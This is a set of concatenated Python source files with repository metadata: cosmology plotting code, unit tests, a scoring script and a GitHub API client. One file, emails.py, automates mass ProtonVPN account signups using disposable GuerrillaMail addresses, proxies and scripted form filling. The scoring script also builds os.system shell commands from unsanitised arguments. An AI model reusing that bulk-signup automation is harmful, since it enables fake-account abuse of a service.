bin_area_2 = 2 * np.pi * -1 * np.diff(cos_theta_2)
npairs_1 = 0.5 * survey_area_sterad * bin_area_1 * (gals_per_sterad ** 2) # Friedrich et al. eq 65
npairs_2 = 0.5 * survey_area_sterad * bin_area_2 * (gals_per_sterad ** 2)
fid_cf_noise_var_1 = 2 * sigma_e ** 4 / npairs_1
fid_cf_noise_var_2 = 2 * sigma_e ** 4 / npairs_2
fid_cf_err_1 = np.sqrt(np.diag(fid_cf_cov_nonoise_1) + fid_cf_noise_var_1)
fid_cf_err_2 = np.sqrt(np.diag(fid_cf_cov_nonoise_2) + fid_cf_noise_var_2)
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, ncols=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.07, right=1, bottom=.07, top=.97, hspace=0, wspace=.12)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
bin_edges_deg_1 = np.degrees(theta_bin_edges_1)
bin_edges_deg_2 = np.degrees(theta_bin_edges_2)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf_1 = cl2cf_22plus_1 @ cl + stabl_vec_1
cf_2 = cl2cf_22plus_2 @ cl + stabl_vec_2
cf_diff_1 = (cf_1 - fid_cf_1) / fid_cf_err_1
cf_diff_2 = (cf_2 - fid_cf_2) / fid_cf_err_2
step_args = {'where': 'post', 'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0, 0].step(bin_edges_deg_1, np.pad(cf_1, (0, 1), mode='edge'), **step_args)
ax[0, 1].step(bin_edges_deg_2, np.pad(cf_2, (0, 1), mode='edge'), **step_args)
ax[1, 0].step(bin_edges_deg_1, np.pad(cf_diff_1, (0, 1), mode='edge'), **step_args)
ax[1, 1].step(bin_edges_deg_2, np.pad(cf_diff_2, (0, 1), mode='edge'), **step_args)
# Add error bars
log_bin_edges_deg_1 = np.log(bin_edges_deg_1)
log_bin_edges_deg_2 = np.log(bin_edges_deg_2)
bin_log_centres_deg_1 = np.exp(log_bin_edges_deg_1[:-1] + 0.5 * np.diff(log_bin_edges_deg_1))
bin_log_centres_deg_2 = np.exp(log_bin_edges_deg_2[:-1] + 0.5 * np.diff(log_bin_edges_deg_2))
error_args = {'lw': 2, 'c': 'black', 'zorder': 5, 'capsize': 5, 'ls': 'None',
'label': r'Cosmic variance + noise $\sqrt{Var (\xi+)}$'}
ax[0, 0].errorbar(bin_log_centres_deg_1, fid_cf_1, yerr=(0.5 * fid_cf_err_1), **error_args)
ax[0, 1].errorbar(bin_log_centres_deg_2, fid_cf_2, yerr=(0.5 * fid_cf_err_2), **error_args)
# Log scale and axis labels
plt.xscale('log')
ax[1, 0].set_xlabel(r'$\theta$ (deg)')
ax[1, 1].set_xlabel(r'$\theta$ (deg)')
ax[0, 0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1, 0].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
# Panel labels
annot_args = {'xy': (.95, .95), 'xycoords': 'axes fraction', 'ha': 'right', 'va': 'top', 'fontsize': 14}
ax[0, 0].annotate(f'{n_bin_1} $\\theta$ bin{"s" if n_bin_1 > 1 else ""}', **annot_args)
ax[0, 1].annotate(f'{n_bin_2} $\\theta$ bin{"s" if n_bin_2 > 1 else ""}', **annot_args)
# Colour bar
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_path is not None:
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def get_extrap_mat(lmin, lmax_in, l_extrap_to):
"""
Generate the power spectrum extrapolation matrix, which is used to extrapolate the power spectrum to high l
to stabilise the Cl-to-CF transform.
This matrix should be (pre-)multiplied by the fiducial power spectrum, then all (pre-)multiplied by the Cl-to-CF
transformation matrix, to produce a 'stabilisation vector' which can be added to any correlation function vector to
stabilise it. Generally the same stabilisation vector should be used for all points in parameter space, to avoid
biases. Note that the extrapolation matrix zeros all power below lmax_in, i.e. it does not give a concatenation of
the original power spectrum and the extrapolated section, but just solely the extrapolated section.
The extrapolation is linear with an l(l+1) weighting, achieved using a block matrix. See extrapolation_equations.pdf
for the derivation of its elements.
Args:
lmin (int): Minimum l in the power spectrum.
lmax_in (int): Maximum l prior to extrapolation.
l_extrap_to (int): Maximum l to which to extrapolate.
Returns:
2D numpy array: Extrapolation matrix.
"""
zero_top = np.zeros((lmax_in - lmin + 1, lmax_in - lmin + 1))
zero_bottom = np.zeros((l_extrap_to - lmax_in, lmax_in - lmin + 1 - 2))
ell_extrap = np.arange(lmax_in + 1, l_extrap_to + 1)
penul_col = (-ell_extrap + lmax_in) * lmax_in * (lmax_in - 1) / (ell_extrap * (ell_extrap + 1))
final_col = (ell_extrap - lmax_in + 1) * lmax_in * (lmax_in + 1) / (ell_extrap * (ell_extrap + 1))
extrap_mat = np.block([[zero_top], [zero_bottom, penul_col[:, np.newaxis], final_col[:, np.newaxis]]])
return extrap_mat
| 47.862637
| 120
| 0.662438
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,035
| 0.4038
|
3c821672ff666bf16f14e39715a6449abc332ecc
| 1,182
|
py
|
Python
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
datacraft-dsc/starfish-py
|
95ff24410f056e8e2d313c3af97439fe003e294a
|
[
"Apache-2.0"
] | 4
|
2019-02-08T03:47:36.000Z
|
2019-10-17T21:45:23.000Z
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
datacraft-dsc/starfish-py
|
95ff24410f056e8e2d313c3af97439fe003e294a
|
[
"Apache-2.0"
] | 81
|
2019-02-09T01:01:51.000Z
|
2020-07-01T08:35:07.000Z
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
oceanprotocol/ocean-py
|
318ad0de2519e61d0a301c040a48d1839cd82425
|
[
"Apache-2.0"
] | 1
|
2021-01-28T12:14:03.000Z
|
2021-01-28T12:14:03.000Z
|
"""
test_18_confirm_purchase
As a developer building a service provider Agent for Ocean,
I need a way to confirm if an Asset has been sucessfully puchased so that
I can determine whether to serve the asset to a given requestor
"""
import secrets
import logging
import json
from starfish.asset import DataAsset
def test_18_confirm_purchase(resources, config, remote_agent_surfer, convex_accounts):
purchaser_account = convex_accounts
test_data = secrets.token_bytes(1024)
asset_data = DataAsset.create('TestAsset', test_data)
asset = remote_agent_surfer.register_asset(asset_data)
assert(asset)
listing = remote_agent_surfer.create_listing(resources.listing_data, asset.did)
listing.set_published(True)
logging.debug("confirm_purchase for listingid: " + listing.listing_id)
response = remote_agent_surfer.update_listing(listing)
logging.debug("update_listing response: " + str(response))
assert(response)
status = 'ordered'
purchase = remote_agent_surfer.purchase_asset(listing, purchaser_account, None, status)
assert(purchase['listingid'] == listing.listing_id)
assert(purchase['status'] == status)
| 35.818182
| 91
| 0.764805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 348
| 0.294416
|
3c8705d494d8a3a52f621df0705a17180cb44780
| 1,230
|
py
|
Python
|
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | 1
|
2015-11-06T00:46:56.000Z
|
2015-11-06T00:46:56.000Z
|
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | null | null | null |
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | null | null | null |
from blaze.expr import TableSymbol
from blaze.expr.datetime import isdatelike
from blaze.compatibility import builtins
from datashape import dshape
import pytest
def test_datetime_dshape():
t = TableSymbol('t', '5 * {name: string, when: datetime}')
assert t.when.day.dshape == dshape('5 * int32')
assert t.when.date.dshape == dshape('5 * date')
def test_date_attribute():
t = TableSymbol('t', '{name: string, when: datetime}')
expr = t.when.day
assert eval(str(expr)).isidentical(expr)
def test_invalid_date_attribute():
t = TableSymbol('t', '{name: string, when: datetime}')
with pytest.raises(AttributeError):
t.name.day
def test_date_attribute_completion():
t = TableSymbol('t', '{name: string, when: datetime}')
assert 'day' in dir(t.when)
assert 'day' not in dir(t.name)
assert not builtins.all([x.startswith('__') and x.endswith('__')
for x in dir(t.name)])
def test_datetime_attribute_name():
t = TableSymbol('t', '{name: string, when: datetime}')
assert 'when' in t.when.day._name
def test_isdatelike():
assert not isdatelike('int32')
assert isdatelike('?date')
assert not isdatelike('{is_outdated: bool}')
| 29.285714
| 68
| 0.669919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 259
| 0.210569
|
3c8be6bc259868341293934801c28e199c01bfba
| 1,539
|
py
|
Python
|
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import os
import time
import gym
import warnings
# Parts of the code are inspired by the AutoML3 competition
from sys import argv, path
from os import getcwd
from os.path import join
verbose = True
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="The experiment runner for the DAC4RL track."
)
parser.add_argument(
"-t",
"--competition-track",
choices=['dac4sgd', 'dac4rl'],
help="DAC4SGD or DAC4RL",
default="dac4rl",
)
parser.add_argument(
"-i",
"--input-dir",
type=str,
default="",
help="",
)
parser.add_argument(
"-o",
"--output-dir",
type=str,
default="",
help="",
)
root_dir = getcwd()
print("Working directory:", root_dir)
args, unknown = parser.parse_known_args()
output_dir = os.path.abspath(args.output_dir)
if verbose:
print("Using output_dir: " + output_dir)
if not os.path.exists(args.output_dir):
print("Path not found:", args.output_dir)
os.makedirs(args.output_dir)
if os.path.exists(args.output_dir):
print("Output directory contents:")
os.system("ls -lR " + args.output_dir)
if os.path.exists(args.input_dir):
os.system("cp " + args.input_dir + "/res/scores.txt " + args.output_dir)
else:
print("No results from ingestion!")
with open(args.output_dir + '/scores.txt', 'r') as fh:
print(fh.readlines())
| 23.676923
| 80
| 0.59974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 387
| 0.251462
|
3c8c318c871167bf3f056e1a05ea008558ab1c56
| 78
|
py
|
Python
|
tests/test_test.py
|
Smirenost/volga
|
109191ee994e99a831d90f3e8aa1d82fc766ca8b
|
[
"MIT"
] | 1
|
2020-11-05T23:40:02.000Z
|
2020-11-05T23:40:02.000Z
|
tests/test_test.py
|
Smirenost/volga
|
109191ee994e99a831d90f3e8aa1d82fc766ca8b
|
[
"MIT"
] | 3
|
2020-11-05T23:46:34.000Z
|
2020-11-12T22:42:12.000Z
|
tests/test_test.py
|
Smirenost/volga
|
109191ee994e99a831d90f3e8aa1d82fc766ca8b
|
[
"MIT"
] | null | null | null |
from volga.json import foo_test
def test_mock():
assert 1 == foo_test()
| 13
| 31
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3c8d359a9fdb99a983fada9faf82eacea1c12723
| 11,067
|
py
|
Python
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 5
|
2020-04-03T13:57:07.000Z
|
2022-03-11T03:20:14.000Z
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 2
|
2020-10-15T20:26:44.000Z
|
2021-05-29T09:36:10.000Z
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 5
|
2020-04-03T13:57:08.000Z
|
2022-01-23T08:52:16.000Z
|
# 🚀 This Project is in it's early stages of Development.
# 📌 Working on new features and main menu.
# ⚠️ Any Questions or Suggestions please Mail to: hendriksdevmail@gmail.com
# 🖥 Version: 1.0.0
from selenium import webdriver
from colorama import Fore, Back, Style
import warnings
import time
import random
import string
import urllib.request
import requests
import csv
import sys
from proxyscrape import create_collector
import os
clear = lambda: os.system('clear')
clear()
collector = create_collector('my-collector', 'https')
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
time.sleep(15)
restart = 2
while (restart > 1):
# Pick an email for Verification. Replace 'YourEmail@Mail.com' with an email adress. (You can use 10min mail for this)
# verifymail = input('\033[31m' + "Enter Email Adress for Verification: " + '\033[0m')
verifymail = ''
# f = open('./input_emails.txt')
# verifymail = f.readline().trim()
# verifymail = 'itlammhewuicxfmhco@ttirv.org'
# Pick an email for Notification. Replace 'YourEmail@Mail.com' with an email adress. (You can use 10min mail for this)
# notifymail = input('\033[31m' + "Enter Email Adress for Recovery: " + '\033[0m')
notifymail = ''
# notifymail = 'itlammhewuicxfmhco@ttirv.org'
proxy_status = "false"
while (proxy_status == "false" and False):
# Retrieve only 'us' proxies
proxygrab = collector.get_proxy({'code': ('in')})
proxy = ("{}:{}".format(proxygrab.host, proxygrab.port))
print ('\033[31m' + "Proxy:", proxy + '\033[0m')
try:
proxy_host = proxygrab.host
proxy_port = proxygrab.port
proxy_auth = ":"
proxies = {'http':'http://{}@{}:{}/'.format(proxy_auth, proxy_host, proxy_port)}
requests.get("http://example.org", proxies=proxies, timeout=1.5)
except OSError:
print ('\033[31m' + "Proxy Connection error!" + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "false"
else:
print ('\033[31m' + "Proxy is working..." + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "true"
else:
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.select import Select
warnings.filterwarnings("ignore", category=DeprecationWarning)
options = Options()
email_driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
email_url = 'https://www.guerrillamail.com/'
email_driver.get(email_url)
time.sleep(4)
# # print(driver.find_element_by_id('inbox-id').text)
email = email_driver.find_element_by_id('inbox-id').text + '@';
domain_name = Select(email_driver.find_element_by_id('gm-host-select')).first_selected_option.text
# # domain_name = email_driver.find_element_by_id('gm-host-select').text
email += domain_name
# print(domain_name)
print(email)
# f = open('./input_emails.txt', 'w')
# f.write(email)
verifymail = email
# email_driver.find_element_by_partial_link_text('verification').click()
# options.add_argument('--proxy-server={}'.format(proxy))
# Change Path to Chrome Driver Path (or move your ChromeDriver into the project folder)
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
# url = 'http://protonmail.com/signup'
url = 'http://account.protonvpn.com/signup'
#url =
def randomStringDigits(stringLength=13):
# Generate a random string of letters and digits
lettersAndDigits = string.ascii_letters + string.digits
return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))
def getUserName():
f = open('lastused.txt')
val = int(f.readline())
f.close()
f = open('lastused.txt', 'w')
val += 1
f.write(str(val))
return 'wowmainia'+str(val - 1)
rngusername = getUserName()
rngpassword = randomStringDigits(15)
driver.get(url)
# time.sleep(10)
# driver.find_element_by_class_name('pm-button w100 mtauto pm-button--primaryborder').click()
# driver.find_element_by_link_text("Get Free").click()
# driver.find_element_by_xpath("/html/body/div[1]/main/main/div/div[4]/div[1]/div[3]/button").click()
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div:nth-child(5) > div:nth-child(1) > div.flex-item-fluid-auto.pt1.pb1.flex.flex-column > button").click()
break
except:
time.sleep(1)
continue
# driver.find_element_by_id('freePlan').click()
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
# time.sleep(4)
# driver.switch_to_frame(0)
# time.sleep(3)
# driver.find_element_by_id('username').send_keys(rngusername)
# time.sleep(1)
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
while True:
try:
driver.find_element_by_id("username").send_keys(rngusername)
driver.find_element_by_id("password").send_keys(rngpassword)
driver.find_element_by_id("passwordConfirmation").send_keys(rngpassword)
driver.find_element_by_id("email").send_keys(verifymail)
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div:nth-child(1) > form > div:nth-child(3) > div > button").click()
break
except:
time.sleep(1)
# driver.switch_to.default_content()
# time.sleep(1)
# driver.find_element_by_id('password').send_keys(rngpassword)
# time.sleep(1)
# driver.find_element_by_id('passwordc').send_keys(rngpassword)
# time.sleep(1)
# driver.switch_to_frame(1)
# time.sleep(1)
# driver.find_element_by_id('notificationEmail').send_keys(notifymail)
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > div > div > div:nth-child(2) > form > div:nth-child(2) > button").click()
break
except:
time.sleep(1)
# time.sleep(60)
# time.sleep(1)
# email_driver.find_element_by_partial_link_text('verification').click()
# email_driver.find_element_by_link_text('notify@protonmail.ch ').click()
while True:
try:
val = email_driver.find_element_by_class_name('email-excerpt').text
if not val[-6:].isnumeric():
raise Exception
print(val[-6:], "verification")
driver.find_element_by_id('code').send_keys(val[-6:])
time.sleep(1)
driver.find_element_by_css_selector('body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > form > div > div > div:nth-child(4) > button').click()
break
except:
time.sleep(1)
# driver.find_element_by_name('submitBtn').click()
# time.sleep(6)
# driver.find_element_by_id('id-signup-radio-email').click()
# time.sleep(1)
# driver.find_element_by_id('emailVerification').send_keys(verifymail)
# time.sleep(1)
# driver.find_element_by_class_name('codeVerificator-btn-send').click()
# time.sleep(3)
print ('\033[31m' + "Your New Email Adress is: ", rngusername,"@protonmail.com", sep='' + '\033[0m')
print ('\033[31m' + "Your New Email Password is: " + '\033[0m' , rngpassword)
complete = "false"
while (complete == "false"):
complete_q = input("Did you complete the Verification process? y/n: ")
if complete_q == "y":
driver.close()
csvData = [[verifymail, rngpassword]]
with open('list.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
print ('Great! We added you account details to the table.')
complete = "true"
else:
print ('Please try verifing and try again')
time.sleep(1)
complete = "false"
else:
restart_s = input("Do you want to restart the Script and create more Accounts? y/n: ")
if restart_s == "y":
restart ++ 1
clear()
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
else:
print ("Ok! The script is exiting now.")
time.sleep(1)
exit()
else:
print("something")
| 37.771331
| 218
| 0.539893
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,866
| 0.529422
|
3c8d3ed266d844941e1c8f372146b0d80fbb53f5
| 1,491
|
py
|
Python
|
fixation/configuration.py
|
deepy/fix-template
|
3f9ce0a74712e9e195c392e0104e7dc8a6a575f5
|
[
"MIT"
] | null | null | null |
fixation/configuration.py
|
deepy/fix-template
|
3f9ce0a74712e9e195c392e0104e7dc8a6a575f5
|
[
"MIT"
] | 9
|
2018-05-10T19:04:03.000Z
|
2018-06-09T18:10:06.000Z
|
fixation/configuration.py
|
deepy/fixation
|
3f9ce0a74712e9e195c392e0104e7dc8a6a575f5
|
[
"MIT"
] | null | null | null |
from fixation.models import get_id, Message, MsgContent, Component, Field, Enum
import os
class Configuration:
@staticmethod
def fiximate(base_dir):
return Configuration(base_dir)
def __init__(self, base_dir, messages='messages', fields='fields', components='components'):
self.base_dir = base_dir
self.message_dir = messages
self.fields_dir = fields
self.components_dir = components
def get_http_path(self, target):
if isinstance(target, Message):
return "{}/{}".format(self.message_dir, get_id(target))
elif isinstance(target, Field):
return "{}/{}".format(self.fields_dir, get_id(target))
elif isinstance(target, Component):
return "{}/{}".format(self.components_dir, get_id(target))
else:
if target.pretty_type().isdigit():
return "{}/{}".format(self.fields_dir, target.pretty_name())
else:
return "{}/{}".format(getattr(self, target.pretty_type().lower()+"s_dir"), target.pretty_name())
def get_paths(self, target):
if target == 'messages':
return os.path.join(self.base_dir, self.message_dir)
elif target == 'fields':
return os.path.join(self.base_dir, self.fields_dir)
elif target == 'components':
return os.path.join(self.base_dir, self.components_dir)
@staticmethod
def get_filename(target):
return get_id(target)
| 35.5
| 112
| 0.627096
| 1,396
| 0.936284
| 0
| 0
| 153
| 0.102616
| 0
| 0
| 102
| 0.06841
|
3c8d77d4d57e1f26a6211fbc207a54886ca5a41a
| 4,201
|
py
|
Python
|
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | 2
|
2021-06-09T20:55:17.000Z
|
2021-11-03T03:07:37.000Z
|
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | null | null | null |
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | 1
|
2020-07-26T02:31:38.000Z
|
2020-07-26T02:31:38.000Z
|
######################
# Loading word2vec
######################
import os
from threading import Semaphore
import gensim
from gensim.models import KeyedVectors
pathToBinVectors = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300.bin'
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
if os.path.isfile(newFilePath):
print("File exists... please wait")
model = KeyedVectors.load(newFilePath, mmap='r')
model.syn0norm = model.syn0 # prevent recalc of normed vectors
model.most_similar('stuff') # any word will do: just to page all in
Semaphore(0).acquire() # just hang until process killed
else:
print("Loading the data file... Please wait...")
model = gensim.models.KeyedVectors.load_word2vec_format(pathToBinVectors, binary=True)
model.init_sims(replace=True)
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
model.save(newFilePath)
print("Successfully loaded 3.6 G bin file!")
# How to call one word vector?
# model1['resume'] -> This will return NumPy vector of the word "resume".
import numpy as np
import math
from scipy.spatial import distance
from random import sample
from nltk.corpus import stopwords
class PhraseVector:
def __init__(self, phrase):
self.vector = self.PhraseToVec(phrase)
# <summary> Calculates similarity between two sets of vectors based on the averages of the sets.</summary>
# <param>name = "vectorSet" description = "An array of arrays that needs to be condensed into a single array (vector). In this class, used to convert word vecs to phrases."</param>
# <param>name = "ignore" description = "The vectors within the set that need to be ignored. If this is an empty list, nothing is ignored. In this class, this would be stop words."</param>
# <returns> The condensed single vector that has the same dimensionality as the other vectors within the vecotSet.</returns>
def ConvertVectorSetToVecAverageBased(self, vectorSet, ignore = []):
if len(ignore) == 0:
return np.mean(vectorSet, axis = 0)
else:
return np.dot(np.transpose(vectorSet) ,ignore ) /sum(ignore)
def PhraseToVec(self, phrase):
cachedStopWords = stopwords.words("english")
phrase = phrase.lower()
wordsInPhrase = [word for word in phrase.split() if word not in cachedStopWords]
vectorSet = []
for aWord in wordsInPhrase:
try:
wordVector =model[aWord]
vectorSet.append(wordVector)
except:
pass
return self.ConvertVectorSetToVecAverageBased(vectorSet)
# <summary> Calculates Cosine similarity between two phrase vectors.</summary>
# <param> name = "otherPhraseVec" description = "The other vector relative to which similarity is to be calculated."</param>
def CosineSimilarity(self, otherPhraseVec):
cosine_similarity = np.dot(self.vector, otherPhraseVec) / \
(np.linalg.norm(self.vector) * np.linalg.norm(otherPhraseVec))
try:
if math.isnan(cosine_similarity):
cosine_similarity = 0
except:
cosine_similarity = 0
return cosine_similarity
if __name__ == "__main__":
print("###################################################################")
print("###################################################################")
print("########### WELCOME TO THE PHRASE SIMILARITY CALCULATOR ###########")
print("###################################################################")
print("###################################################################")
text1 = 'Matt Lieber is a garment that the wind shook.'
text2 = 'Matt Lieber is a final shrug of the shoulders.'
phraseVector1 = PhraseVector(text1)
phraseVector2 = PhraseVector(text2)
similarityScore = phraseVector1.CosineSimilarity(phraseVector2.vector)
print("###################################################################")
print("Similarity Score: ", similarityScore)
print("###################################################################")
| 44.221053
| 191
| 0.615092
| 2,022
| 0.481314
| 0
| 0
| 0
| 0
| 0
| 0
| 2,014
| 0.47941
|
3c8f07d1d3e0d5bb32a801e512cab31d3aca91cc
| 134
|
py
|
Python
|
LISTAS/Valores-unicos-em-uma-Lista-1/main.py
|
lucasf5/Python
|
c5649121e2af42922e2d9c19cec98322e132bdab
|
[
"MIT"
] | 1
|
2021-09-28T13:11:56.000Z
|
2021-09-28T13:11:56.000Z
|
LISTAS/Valores-unicos-em-uma-Lista-1/main.py
|
lucasf5/Python
|
c5649121e2af42922e2d9c19cec98322e132bdab
|
[
"MIT"
] | null | null | null |
LISTAS/Valores-unicos-em-uma-Lista-1/main.py
|
lucasf5/Python
|
c5649121e2af42922e2d9c19cec98322e132bdab
|
[
"MIT"
] | null | null | null |
lista = []
x = 0
while x != 999:
x = int(input('Numero: '))
if x not in lista:
lista.append(x)
lista.sort()
print(lista)
| 11.166667
| 28
| 0.559701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.074627
|
3c8f9f7ee5923a773fc310335335a5650e8aeefb
| 12,399
|
py
|
Python
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 8
|
2021-09-22T21:06:13.000Z
|
2022-03-27T09:52:55.000Z
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 6
|
2021-07-30T09:35:01.000Z
|
2022-03-30T13:16:03.000Z
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 2
|
2021-08-14T10:45:37.000Z
|
2021-11-20T12:41:13.000Z
|
"""
Copyright 2021 Janrey "CodexLink" Licas
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ast import literal_eval
from asyncio import sleep
from logging import Logger
from os import _exit as terminate
from typing import Any, Callable, Optional, Union
from aiohttp import BasicAuth, ClientResponse, ClientSession
from elements.constants import (
COMMIT_REQUEST_PAYLOAD,
DISCORD_CLIENT_INTENTS,
REQUEST_HEADER,
ExitReturnCodes,
GithubRunnerActions,
GithubRunnerLevelMessages,
)
from elements.typing import (
Base64String,
HttpsURL,
READMEContent,
READMEIntegritySHA,
READMERawContent,
)
class AsyncGithubAPILite:
# * The following variables are declared for weak reference since there's no hint-typing inheritance.
envs: Any
logger: Logger
print_exception: Callable
"""
This child class is a scratch implementation based from Github API. It was supposed to be a re-write implementation of PyGithub for async,
but I just realized that I only need some certain components. This class also contains session for all HTTPS requests and that includes Badgen.
"""
async def __ainit__(self) -> None:
"""
Asynchronous init for instantiating other classes, if there's another one behind the MRO, which is the DiscordClientHandler.
This also instantiates aiohttp.ClientSession for future requests.
"""
self._api_session: ClientSession = ClientSession()
self.logger.info("ClientSession for API Requests has been instantiated.")
super().__init__()
self.logger.info(
f"Discord Client Instantiatied with intents={DISCORD_CLIENT_INTENTS=}"
)
self.logger.info(
f"{AsyncGithubAPILite.__name__} is done initializing other elements."
)
async def exec_api_actions(
self,
action: GithubRunnerActions,
data: Optional[list[Union[READMEIntegritySHA, READMERawContent]]] = None,
) -> Union[None, list[Union[READMEIntegritySHA, Base64String]]]:
"""
A method that handles every possible requests by packaging required components into one. This was done so that we only have to call the method without worrying anything.
Args:
action (GithubRunnerActions): The action to perform. Choices should be FETCH_README and COMMIT_CHANGES.
data (Optional[list[tuple[READMEIntegritySHA, READMERawContent]]] , optional): The data required for COMMIT_CHANGES.
Basically it needs the old README SHA integrity and the new README in the form of Base64 (READMERawContent). Defaults to None.
Returns:
